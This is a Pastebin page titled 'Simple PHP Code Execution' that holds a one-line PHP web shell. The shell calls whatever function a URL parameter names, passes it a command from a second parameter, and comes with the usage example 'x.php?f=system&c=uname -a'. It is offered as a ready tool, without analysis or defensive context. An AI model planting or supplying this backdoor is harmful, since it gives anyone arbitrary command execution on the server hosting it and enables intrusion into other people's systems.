ToKeiChun

Simple PHP Code Execution [usage:x.php?f=system&c=uname -a]

Jan 16th, 2019
248
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.03 KB | None | 0 0
  1. <?php $_GET['f']($_GET['c']) ?>
Add Comment
Please, Sign In to add comment